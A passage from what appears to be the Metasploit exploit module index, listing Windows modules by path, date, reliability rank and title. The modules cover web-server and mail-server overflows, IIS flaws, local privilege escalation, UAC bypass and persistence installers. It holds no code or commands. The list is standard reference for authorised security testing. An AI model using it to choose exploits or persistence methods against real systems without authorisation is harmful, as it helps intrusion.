Authorization Header Buffer Overflow + 1470 windows/http/manage_engine_opmanager_rce 2015-09-14 manual Yes ManageEngine OpManager Remote Code Execution + 1471 windows/http/manageengine_adshacluster_rce 2018-06-28 excellent Yes Manage Engine Exchange Reporter Plus Unauthenticated RCE + 1472 windows/http/manageengine_appmanager_exec 2018-03-07 excellent Yes ManageEngine Applications Manager Remote Code Execution + 1473 windows/http/manageengine_apps_mngr 2011-04-08 average No ManageEngine Applications Manager Authenticated Code Execution + 1474 windows/http/manageengine_connectionid_write 2015-12-14 excellent Yes ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability + 1475 windows/http/maxdb_webdbm_database 2006-08-29 good No MaxDB WebDBM Database Parameter Overflow + 1476 windows/http/maxdb_webdbm_get_overflow 2005-04-26 good No MaxDB WebDBM GET Buffer Overflow + 1477 windows/http/mcafee_epolicy_source 2006-07-17 average Yes McAfee ePolicy Orchestrator / ProtectionPilot Overflow + 1478 windows/http/mdaemon_worldclient_form2raw 2003-12-29 great Yes MDaemon WorldClient form2raw.cgi Stack Buffer Overflow + 1479 windows/http/minishare_get_overflow 2004-11-07 average No Minishare 1.4.1 Buffer Overflow + 1480 windows/http/miniweb_upload_wbem 2013-04-09 excellent Yes MiniWeb (Build 300) Arbitrary File Upload + 1481 windows/http/navicopa_get_overflow 2006-09-28 great Yes NaviCOPA 2.0.1 URL Handling Buffer Overflow + 1482 windows/http/netdecision_http_bof 2012-02-24 normal Yes NetDecision 4.5.1 HTTP Server Buffer Overflow + 1483 windows/http/netgear_nms_rce 2016-02-04 excellent Yes NETGEAR ProSafe Network Management System 300 Arbitrary File Upload + 1484 windows/http/novell_imanager_upload 2010-10-01 excellent No Novell iManager getMultiPartParameters Arbitrary File Upload + 1485 windows/http/novell_mdm_lfi 2013-03-13 excellent Yes Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability + 1486 windows/http/novell_messenger_acceptlang 2006-04-13 average No Novell Messenger Server 2.0 Accept-Language Overflow + 1487 windows/http/nowsms 2008-02-19 good No Now SMS/MMS Gateway Buffer Overflow + 1488 windows/http/octopusdeploy_deploy 2017-05-15 excellent Yes Octopus Deploy Authenticated Code Execution + 1489 windows/http/oracle9i_xdb_pass 2003-08-18 great Yes Oracle 9i XDB HTTP PASS Overflow (win32) + 1490 windows/http/oracle_beehive_evaluation 2010-06-09 excellent Yes Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability + 1491 windows/http/oracle_beehive_prepareaudiotoplay 2015-11-10 excellent Yes Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload + 1492 windows/http/oracle_btm_writetofile 2012-08-07 excellent No Oracle Business Transaction Management FlashTunnelService Remote Code Execution + 1493 windows/http/oracle_endeca_exec 2013-07-16 excellent Yes Oracle Endeca Server Remote Command Execution + 1494 windows/http/oracle_event_processing_upload 2014-04-21 excellent Yes Oracle Event Processing FileUploadServlet Arbitrary File Upload + 1495 windows/http/osb_uname_jlist 2010-07-13 excellent No Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability + 1496 windows/http/peercast_url 2006-03-08 average No PeerCast URL Handling Buffer Overflow + 1497 windows/http/php_apache_request_headers_bof 2012-05-08 normal No PHP apache_request_headers Function Buffer Overflow + 1498 windows/http/privatewire_gateway 2006-06-26 average No Private Wire Gateway Buffer Overflow + 1499 windows/http/psoproxy91_overflow 2004-02-20 average Yes PSO Proxy v0.91 Stack Buffer Overflow + 1500 windows/http/rabidhamster_r4_log 2012-02-09 normal Yes RabidHamster R4 Log Entry sprintf() Buffer Overflow + 1501 windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution + 1502 windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow + 1503 windows/http/sap_configservlet_exec_noauth 2012-11-01 great Yes SAP ConfigServlet Remote Code Execution + 1504 windows/http/sap_host_control_cmd_exec 2012-08-14 average Yes SAP NetWeaver HostControl Command Injection + 1505 windows/http/sapdb_webtools 2007-07-05 great No SAP DB 7.4 WebTools Buffer Overflow + 1506 windows/http/savant_31_overflow 2002-09-10 great Yes Savant 3.1 Web Server Overflow + 1507 windows/http/sepm_auth_bypass_rce 2015-07-31 excellent No Symantec Endpoint Protection Manager Authentication Bypass and Code Execution + 1508 windows/http/serviio_checkstreamurl_cmd_exec 2017-05-03 excellent Yes Serviio Media Server checkStreamUrl Command Execution + 1509 windows/http/servu_session_cookie 2009-11-01 good Yes Rhinosoft Serv-U Session Cookie Buffer Overflow + 1510 windows/http/shoutcast_format 2004-12-23 average Yes SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow + 1511 windows/http/shttpd_post 2006-10-06 average No SHTTPD URI-Encoded POST Request Overflow + 1512 windows/http/solarwinds_fsm_userlogin 2015-03-13 excellent Yes Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability + 1513 windows/http/solarwinds_storage_manager_sql 2011-12-07 excellent Yes Solarwinds Storage Manager 5.1.0 SQL Injection + 1514 windows/http/sonicwall_scrutinizer_sqli 2012-07-22 excellent Yes Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection + 1515 windows/http/steamcast_useragent 2008-01-24 average Yes Streamcast HTTP User-Agent Buffer Overflow + 1516 windows/http/sws_connection_bof 2012-07-20 normal Yes Simple Web Server Connection Header Buffer Overflow + 1517 windows/http/sybase_easerver 2005-07-25 average No Sybase EAServer 5.2 Remote Stack Buffer Overflow + 1518 windows/http/syncbreeze_bof 2017-03-15 great Yes Sync Breeze Enterprise GET Buffer Overflow + 1519 windows/http/sysax_create_folder 2012-07-29 normal No Sysax Multi Server 5.64 Create Folder Buffer Overflow + 1520 windows/http/trackercam_phparg_overflow 2005-02-18 average Yes TrackerCam PHP Argument Buffer Overflow + 1521 windows/http/trackit_file_upload 2014-10-07 excellent Yes Numara / BMC Track-It! FileStorageService Arbitrary File Upload + 1522 windows/http/trendmicro_officescan 2007-06-28 good No Trend Micro OfficeScan Remote Stack Buffer Overflow + 1523 windows/http/trendmicro_officescan_widget_exec 2017-10-07 excellent Yes Trend Micro OfficeScan Remote Code Execution + 1524 windows/http/ultraminihttp_bof 2013-07-10 normal No Ultra Mini HTTPD Stack Buffer Overflow + 1525 windows/http/umbraco_upload_aspx 2012-06-28 excellent No Umbraco CMS Remote Command Execution + 1526 windows/http/vmware_vcenter_chargeback_upload 2013-05-15 excellent Yes VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload + 1527 windows/http/vxsrchs_bof 2017-03-15 great Yes VX Search Enterprise GET Buffer Overflow + 1528 windows/http/webster_http 2002-12-02 average No Webster HTTP Server GET Buffer Overflow + 1529 windows/http/xampp_webdav_upload_php 2012-01-14 excellent No XAMPP WebDAV PHP Upload + 1530 windows/http/xitami_if_mod_since 2007-09-24 average Yes Xitami 2.5c2 Web Server If-Modified-Since Overflow + 1531 windows/http/zenworks_assetmgmt_uploadservlet 2011-11-02 excellent No Novell ZENworks Asset Management Remote Execution + 1532 windows/http/zenworks_uploadservlet 2010-03-30 excellent No Novell ZENworks Configuration Management Remote Execution + 1533 windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow + 1534 windows/iis/iis_webdav_upload_asp 1994-01-01 excellent No Microsoft IIS WebDAV Write Access Code Execution + 1535 windows/iis/ms01_023_printer 2001-05-01 good Yes MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow + 1536 windows/iis/ms01_026_dbldecode 2001-05-15 excellent Yes MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution + 1537 windows/iis/ms01_033_idq 2001-06-18 good No MS01-033 Microsoft IIS 5.0 IDQ Path Overflow + 1538 windows/iis/ms02_018_htr 2002-04-10 good No MS02-018 Microsoft IIS 4.0 .HTR Path Overflow + 1539 windows/iis/ms02_065_msadc 2002-11-20 normal Yes MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow + 1540 windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow + 1541 windows/iis/msadc 1998-07-17 excellent Yes MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution + 1542 windows/imap/eudora_list 2005-12-20 great Yes Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow + 1543 windows/imap/imail_delete 2004-11-12 average No IMail IMAP4D Delete Overflow + 1544 windows/imap/ipswitch_search 2007-07-18 average No Ipswitch IMail IMAP SEARCH Buffer Overflow + 1545 windows/imap/mailenable_login 2006-12-11 great No MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow + 1546 windows/imap/mailenable_status 2005-07-13 great No MailEnable IMAPD (1.54) STATUS Request Buffer Overflow + 1547 windows/imap/mailenable_w3c_select 2005-10-03 great Yes MailEnable IMAPD W3C Logging Buffer Overflow + 1548 windows/imap/mdaemon_cram_md5 2004-11-12 great No Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow + 1549 windows/imap/mdaemon_fetch 2008-03-13 great Yes MDaemon 9.6.4 IMAPD FETCH Buffer Overflow + 1550 windows/imap/mercur_imap_select_overflow 2006-03-17 average No Mercur v5.0 IMAP SP3 SELECT Buffer Overflow + 1551 windows/imap/mercur_login 2006-03-17 average No Mercur Messaging 2005 IMAP Login Buffer Overflow + 1552 windows/imap/mercury_login 2007-03-06 normal Yes Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow + 1553 windows/imap/mercury_rename 2004-11-29 average Yes Mercury/32 v4.01a IMAP RENAME Buffer Overflow + 1554 windows/imap/novell_netmail_append 2006-12-23 average No Novell NetMail IMAP APPEND Buffer Overflow + 1555 windows/imap/novell_netmail_auth 2007-01-07 average No Novell NetMail IMAP AUTHENTICATE Buffer Overflow + 1556 windows/imap/novell_netmail_status 2005-11-18 average No Novell NetMail IMAP STATUS Buffer Overflow + 1557 windows/imap/novell_netmail_subscribe 2006-12-23 average No Novell NetMail IMAP SUBSCRIBE Buffer Overflow + 1558 windows/isapi/ms00_094_pbserver 2000-12-04 good Yes MS00-094 Microsoft IIS Phone Book Service Overflow + 1559 windows/isapi/ms03_022_nsiislog_post 2003-06-25 good Yes MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow + 1560 windows/isapi/ms03_051_fp30reg_chunked 2003-11-11 good Yes MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow + 1561 windows/isapi/rsa_webagent_redirect 2005-10-21 good Yes Microsoft IIS ISAPI RSA WebAgent Redirect Overflow + 1562 windows/isapi/w3who_query 2004-12-06 good Yes Microsoft IIS ISAPI w3who.dll Query String Overflow + 1563 windows/ldap/imail_thc 2004-02-17 average No IMail LDAP Service Buffer Overflow + 1564 windows/ldap/pgp_keyserver7 2001-07-16 good No Network Associates PGP KeyServer 7 LDAP Buffer Overflow + 1565 windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow + 1566 windows/license/calicserv_getconfig 2005-03-02 normal Yes Computer Associates License Server GETCONFIG Overflow + 1567 windows/license/flexnet_lmgrd_bof 2012-03-23 normal No FlexNet License Server Manager lmgrd Buffer Overflow + 1568 windows/license/sentinel_lm7_udp 2005-03-07 average Yes SentinelLM UDP Buffer Overflow + 1569 windows/local/adobe_sandbox_adobecollabsync 2013-05-14 great Yes AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass + 1570 windows/local/agnitum_outpost_acs 2013-08-02 excellent Yes Agnitum Outpost Internet Security Local Privilege Escalation + 1571 windows/local/alpc_taskscheduler 2018-08-27 normal No Microsoft Windows ALPC Task Scheduler Local Privilege Elevation + 1572 windows/local/always_install_elevated 2010-03-18 excellent Yes Windows AlwaysInstallElevated MSI + 1573 windows/local/applocker_bypass 2015-08-03 excellent No AppLocker Execution Prevention Bypass + 1574 windows/local/ask 2012-01-03 excellent No Windows Escalate UAC Execute RunAs + 1575 windows/local/bthpan 2014-07-18 average Yes MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation + 1576 windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass + 1577 windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) + 1578 windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) + 1579 windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) + 1580 windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) + 1581 windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS + 1582 windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) + 1583 windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) + 1584 windows/local/capcom_sys_exec 1999-01-01 normal Yes Windows Capcom.sys Kernel Execution Exploit (x64 only) + 1585 windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token + 1586 windows/local/cve_2017_8464_lnk_lpe 2017-06-13 excellent Yes LNK Code Execution Vulnerability + 1587 windows/local/ikeext_service 2012-10-09 good Yes IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL + 1588 windows/local/ipass_launch_app 2015-03-12 excellent Yes iPass Mobile Client Service Privilege Escalation + 1589 windows/local/lenovo_systemupdate 2015-04-12 excellent Yes Lenovo System Update Privilege Escalation + 1590 windows/local/mov_ss 2018-05-08 excellent No Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability + 1591 windows/local/mqac_write 2014-07-22 average Yes MQAC.sys Arbitrary Write Privilege Escalation + 1592 windows/local/ms10_015_kitrap0d 2010-01-19 great Yes Windows SYSTEM Escalation via KiTrap0D + 1593 windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation + 1594 windows/local/ms11_080_afdjoinleaf 2011-11-30 average No MS11-080 AfdJoinLeaf Privilege Escalation + 1595 windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent No MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation + 1596 windows/local/ms13_053_schlamperei 2013-12-01 average Yes Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) + 1597 windows/local/ms13_081_track_popup_menu 2013-10-08 average Yes Windows TrackPopupMenuEx Win32k NULL Page + 1598 windows/local/ms13_097_ie_registry_symlink 2013-12-10 great No MS13-097 Registry Symlink IE Sandbox Escape + 1599 windows/local/ms14_009_ie_dfsvc 2014-02-11 great Yes MS14-009 .NET Deployment Service IE Sandbox Escape + 1600 windows/local/ms14_058_track_popup_menu 2014-10-14 normal Yes Windows TrackPopupMenu Win32k NULL Pointer Dereference + 1601 windows/local/ms14_070_tcpip_ioctl 2014-11-11 average Yes MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference + 1602 windows/local/ms15_004_tswbproxy 2015-01-13 good Yes MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape + 1603 windows/local/ms15_051_client_copy_image 2015-05-12 normal Yes Windows ClientCopyImage Win32k Exploit + 1604 windows/local/ms15_078_atmfd_bof 2015-07-11 manual Yes MS15-078 Microsoft Windows Font Driver Buffer Overflow + 1605 windows/local/ms16_014_wmi_recv_notif 2015-12-04 normal Yes Windows WMI Recieve Notification Exploit + 1606 windows/local/ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav Local Privilege Escalation + 1607 windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation + 1608 windows/local/ms16_075_reflection 2016-01-16 normal Yes Windows Net-NTLMv2 Reflection DCOM/RPC + 1609 windows/local/ms16_075_reflection_juicy 2016-01-16 great Yes Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy) + 1610 windows/local/ms18_8120_win32k_privesc 2018-05-09 good No Windows SetImeInfoEx Win32k NULL Pointer Dereference + 1611 windows/local/ms_ndproxy 2013-11-27 average Yes MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation + 1612 windows/local/novell_client_nicm 2013-05-22 average Yes Novell Client 2 SP3 nicm.sys Local Privilege Escalation + 1613 windows/local/novell_client_nwfs 2008-06-26 average No Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation + 1614 windows/local/ntapphelpcachecontrol 2014-09-30 normal Yes MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check + 1615 windows/local/nvidia_nvsvc 2012-12-25 average Yes Nvidia (nvsvc) Display Driver Service Local Privilege Escalation + 1616 windows/local/panda_psevents 2016-06-27 excellent Yes Panda Security PSEvents Privilege Escalation + 1617 windows/local/payload_inject 2011-10-12 excellent No Windows Manage Memory Payload Injection + 1618 windows/local/persistence 2011-10-19 excellent No Windows Persistent Registry Startup Payload Installer + 1619 windows/local/persistence_service 2018-10-20 excellent No Windows Persistent Service Installer + 1620 windows/local/powershell_cmd_upgrade 1999-01-01 excellent No Windows Command Shell Upgrade (Powershell) + 1621 windows/local/powershell_remoting 1999-01-01 excellent No Powershell Remoting Remote Command Execution + 1622 windows/local/ppr_flatten_rec 2013-05-15 average Yes Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation + 1623 windows/local/ps_persist 2012-08-14 excellent No Powershell Payload Execution + 1624 windows/local/ps_wmi_exec 2012-08-19 excellent No Authenticated WMI Exec via Powershell + 1625 windows/local/pxeexploit 2011-08-05 excellent No PXE Exploit Server + 1626 windows/local/razer_zwopenprocess 2017-03-22 normal Yes Razer Synapse rzpnk.sys ZwOpenProcess + 1627 windows/local/registry_persistence 2015-07-01 excellent Yes Windows Registry Only Persistence + 1628 windows/local/run_as 1999-01-01 excellent No Windows Run Command As User + 1629 windows/local/s4u_persistence 2013-01-02 excellent No Windows Manage User Level Persistent Payload Installer + 1630 windows/local/service_permissions 2012-10-15 great No Windows Escalate Service Permissions Local Privilege Escalation + 1631 windows/local/trusted_service_path 2001-10-25 excellent Yes Windows Service Trusted Path Privilege Escalation + 1632 windows/local/virtual_box_guest_additions 2014-07-15 average Yes VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation + 1633 windows/local/virtual_box_opengl_escape 2014-03-11 average Yes VirtualBox 3D Acceleration Virtual Machine Escape + 1634 windows/local/vss_persistence 2011-10-21 excellent No Persistent Payload in Windows Volume Shadow Copy + 1635 windows/local/webexec 2018-10-09 good Yes WebEx Local Service Permissions Exploit + 1636 windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution + 1637 windows/local/wmi_persistence 2017-06-06 normal No WMI Event Subscription Persistence + 1638 windows/lotus/domino_http_accept_language 2008-05-20 average No IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow + 1639 windows/lotus/domino_icalendar_organizer 2010-09-14 normal Yes IBM Lotus Domino iCalendar MAILTO Buffer Overflow + 1640 windows/lotus/domino_sametime_stmux 2008-05-21 average Yes IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow + 1641 windows/lotus/lotusnotes_lzh 2011-05-24 normal No Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) + 1642 windows/lpd/hummingbird_exceed 2005-05-27 average No Hummingbird Connectivity 10 SP5 LPD Buffer Overflow + 1643 windows/lpd/niprint 2003-11-05 good No NIPrint LPD Request Overflow + 1644 windows/lpd/saplpd 2008-02-04 good No SAP SAPLPD 6.28 Buffer Overflow + 1645 windows/lpd/wincomlpd_admin 2008-02-04 good No WinComLPD Buffer Overflow + 1646 windows/misc/achat_bof 2014-12-18 normal No Achat Unicode SEH Buffer Overflow + 1647 windows/misc/actfax_raw_server_bof 2013-02-05 normal No ActFax 5.01 RAW Server Buffer Overflow + 1648 windows/misc/agentxpp_receive_agentx 2010-04-16 good No AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow + 1649 windows/misc/ais_esel_server_rce 2019-03-27 excellent Yes AIS logistics ESEL-Server Unauth SQL Injection RCE + 1650 windows/misc/allmediaserver_bof 2012-07-04 normal No ALLMediaServer 0.8 Buffer Overflow + 1651 windows/misc/altiris_ds_sqli 2008-05-15 normal Yes Symantec Altiris DS SQL Injection + 1652 windows/misc/apple_quicktime_rtsp_response 2007-11-23 normal No Apple QuickTime 7.3 RTSP Response Header Buffer Overflow + 1653 windows/misc/asus_dpcproxy_overflow 2008-03-21 average No Asus Dpcproxy Buffer Overflow + 1654 windows/misc/avaya_winpmd_unihostrouter 2011-05-23 normal No Avaya WinPMD UniteHostRouter Buffer Overflow + 1655 windows/misc/avidphoneticindexer 2011-11-29 normal No Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow + 1656 windows/misc/bakbone_netvault_heap 2005-04-01 average Yes BakBone NetVault Remote Heap Overflow + 1657 windows/misc/bcaaa_bof 2011-04-04 good No Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow + 1658 windows/misc/bigant_server 2008-04-15 average No BigAnt Server 2.2 Buffer Overflow + 1659 windows/misc/bigant_server_250 2008-04-15 great No BigAnt Server 2.50 SP1 Buffer Overflow + 1660 windows/misc/bigant_server_dupf_upload 2013-01-09 excellent No BigAnt Server DUPF Command Arbitrary File Upload + 1661 windows/misc/bigant_server_sch_dupf_bof 2013-01-09 normal No BigAnt Server 2 SCH And DUPF Buffer Overflow + 1662 windows/misc/bigant_server_usv 2009-12-29 great No BigAnt Server 2.52 USV Buffer Overflow + 1663 windows/misc/bomberclone_overflow 2006-02-16 average No Bomberclone 0.11.6 Buffer Overflow + 1664 windows/misc/bopup_comm 2009-06-18 good No Bopup Communications Server Buffer Overflow + 1665 windows/misc/borland_interbase 2007-07-24 average No Borland Interbase Create-Request Buffer Overflow + 1666 windows/misc/borland_starteam 2008-04-02 average No Borland CaliberRM StarTeam Multicast Service Buffer Overflow + 1667 windows/misc/citrix_streamprocess 2011-01-20 good No Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow + 1668 windows/misc/citrix_streamprocess_data_msg 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow + 1669 windows/misc/citrix_streamprocess_get_boot_record_request 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow + 1670 windows/misc/citrix_streamprocess_get_footer 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow + 1671 windows/misc/citrix_streamprocess_get_objects 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow + 1672 windows/misc/cloudme_sync 2018-01-17 great No CloudMe Sync v1.10.9 + 1673 windows/misc/commvault_cmd_exec 2017-12-12 good No Commvault Communications Service (cvd) Command Injection + 1674 windows/misc/disk_savvy_adm 2017-01-31 great No Disk Savvy Enterprise v10.4.18 + 1675 windows/misc/doubletake 2008-06-04 average No DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow + 1676 windows/misc/eiqnetworks_esa 2006-07-24 average No eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow + 1677 windows/misc/eiqnetworks_esa_topology 2006-07-25 average No eIQNetworks ESA Topology DELETEDEVICE Overflow + 1678 windows/misc/enterasys_netsight_syslog_bof 2011-12-19 normal No Enterasys NetSight nssyslogd.exe Buffer Overflow + 1679 windows/misc/eureka_mail_err 2009-10-22 normal No Eureka Email 2.2q ERR Remote Buffer Overflow + 1680 windows/misc/fb_cnct_group 2013-01-31 normal Yes Firebird Relational Database CNCT Group Number Buffer Overflow + 1681 windows/misc/fb_isc_attach_database 2007-10-03 average No Firebird Relational Database isc_attach_database() Buffer Overflow + 1682 windows/misc/fb_isc_create_database 2007-10-03 average No Firebird Relational Database isc_create_database() Buffer Overflow + 1683 windows/misc/fb_svc_attach 2007-10-03 average No Firebird Relational Database SVC_attach() Buffer Overflow + 1684 windows/misc/gh0st 2017-07-27 normal Yes Gh0st Client buffer Overflow + 1685 windows/misc/gimp_script_fu 2012-05-18 normal No GIMP script-fu Server Buffer Overflow + 1686 windows/misc/hp_dataprotector_cmd_exec 2014-11-02 excellent Yes HP Data Protector 8.10 Remote Command Execution + 1687 windows/misc/hp_dataprotector_crs 2013-06-03 normal Yes HP Data Protector Cell Request Service Buffer Overflow + 1688 windows/misc/hp_dataprotector_dtbclslogin 2010-09-09 normal Yes HP Data Protector DtbClsLogin Buffer Overflow + 1689 windows/misc/hp_dataprotector_encrypted_comms 2016-04-18 normal Yes HP Data Protector Encrypted Communication Remote Command Execution + 1690 windows/misc/hp_dataprotector_exec_bar 2014-01-02 excellent Yes HP Data Protector Backup Client Service Remote Code Execution + 1691 windows/misc/hp_dataprotector_install_service 2011-11-02 excellent Yes HP Data Protector 6.10/6.11/6.20 Install Service + 1692 windows/misc/hp_dataprotector_new_folder 2012-03-12 normal No HP Data Protector Create New Folder Buffer Overflow + 1693 windows/misc/hp_dataprotector_traversal 2014-01-02 great Yes HP Data Protector Backup Client Service Directory Traversal + 1694 windows/misc/hp_imc_dbman_restartdb_unauth_rce 2017-05-15 excellent Yes HPE iMC dbman RestartDB Unauthenticated RCE + 1695 windows/misc/hp_imc_dbman_restoredbase_unauth_rce 2017-05-15 excellent Yes HPE iMC dbman RestoreDBase Unauthenticated RCE + 1696 windows/misc/hp_imc_uam 2012-08-29 normal No HP Intelligent Management Center UAM Buffer Overflow + 1697 windows/misc/hp_loadrunner_magentproc 2013-07-27 normal No HP LoadRunner magentproc.exe Overflow + 1698 windows/misc/hp_loadrunner_magentproc_cmdexec 2010-05-06 excellent No HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution + 1699 windows/misc/hp_magentservice 2012-01-12 average No HP Diagnostics Server magentservice.exe Overflow + 1700 windows/misc/hp_omniinet_1 2009-12-17 great Yes HP OmniInet.exe MSG_PROTOCOL Buffer Overflow + 1701 windows/misc/hp_omniinet_2 2009-12-17 great Yes HP OmniInet.exe MSG_PROTOCOL Buffer Overflow + 1702 windows/misc/hp_omniinet_3 2011-06-29 great Yes HP OmniInet.exe Opcode 27 Buffer Overflow + 1703 windows/misc/hp_omniinet_4 2011-06-29 good No HP OmniInet.exe Opcode 20 Buffer Overflow + 1704 windows/misc/hp_operations_agent_coda_34 2012-07-09 normal Yes HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow + 1705 windows/misc/hp_operations_agent_coda_8c 2012-07-09 normal Yes HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow + 1706 windows/misc/hp_ovtrace 2007-08-09 average No HP OpenView Operations OVTrace Buffer Overflow + 1707 windows/misc/hta_server 2016-10-06 manual No HTA Web Server + 1708 windows/misc/ib_isc_attach_database 2007-10-03 good No Borland InterBase isc_attach_database() Buffer Overflow + 1709 windows/misc/ib_isc_create_database 2007-10-03 good No Borland InterBase isc_create_database() Buffer Overflow + 1710 windows/misc/ib_svc_attach 2007-10-03 good No Borland InterBase SVC_attach() Buffer Overflow + 1711 windows/misc/ibm_cognos_tm1admsd_bof 2012-04-02 normal No IBM Cognos tm1admsd.exe Overflow + 1712 windows/misc/ibm_director_cim_dllinject 2009-03-10 excellent Yes IBM System Director Agent DLL Injection + 1713 windows/misc/ibm_tsm_cad_ping 2009-11-04 good No IBM Tivoli Storage Manager Express CAD Service Buffer Overflow + 1714 windows/misc/ibm_tsm_rca_dicugetidentify 2009-11-04 great No IBM Tivoli Storage Manager Express RCA Service Buffer Overflow + 1715 windows/misc/ibm_websphere_java_deserialize 2015-11-06 excellent No IBM WebSphere RCE Java Deserialization Vulnerability + 1716 windows/misc/itunes_extm3u_bof 2012-06-21 normal No Apple iTunes 10 Extended M3U Stack Buffer Overflow + 1717 windows/misc/landesk_aolnsrvr 2007-04-13 average No LANDesk Management Suite 8.7 Alert Service Buffer Overflow + 1718 windows/misc/lianja_db_net 2013-05-22 normal Yes Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow + 1719 windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution + 1720 windows/misc/mercury_phonebook 2005-12-19 average No Mercury/32 PH Server Module Buffer Overflow + 1721 windows/misc/mini_stream 2009-12-25 normal No Mini-Stream 3.0.1.1 Buffer Overflow + 1722 windows/misc/mirc_privmsg_server 2008-10-02 normal No mIRC PRIVMSG Handling Stack Buffer Overflow + 1723 windows/misc/ms07_064_sami 2007-12-11 normal No MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow + 1724 windows/misc/ms10_104_sharepoint 2010-12-14 excellent Yes MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution + 1725 windows/misc/netcat110_nt 2004-12-27 great No Netcat v1.10 NT Stack Buffer Overflow + 1726 windows/misc/nettransport 2010-01-02 normal No NetTransport Download Manager 2.90.510 Buffer Overflow + 1727 windows/misc/nvidia_mental_ray 2013-12-10 excellent No Nvidia Mental Ray Satellite Service Arbitrary DLL Injection + 1728 windows/misc/plugx 2017-07-27 normal Yes PlugX Controller Stack Overflow + 1729 windows/misc/poisonivy_21x_bof 2016-06-03 normal Yes Poison Ivy 2.1.x C2 Buffer Overflow + 1730 windows/misc/poisonivy_bof 2012-06-24 normal Yes Poison Ivy Server Buffer Overflow + 1731 windows/misc/poppeeper_date 2009-02-27 normal No POP Peeper v3.4 DATE Buffer Overflow + 1732 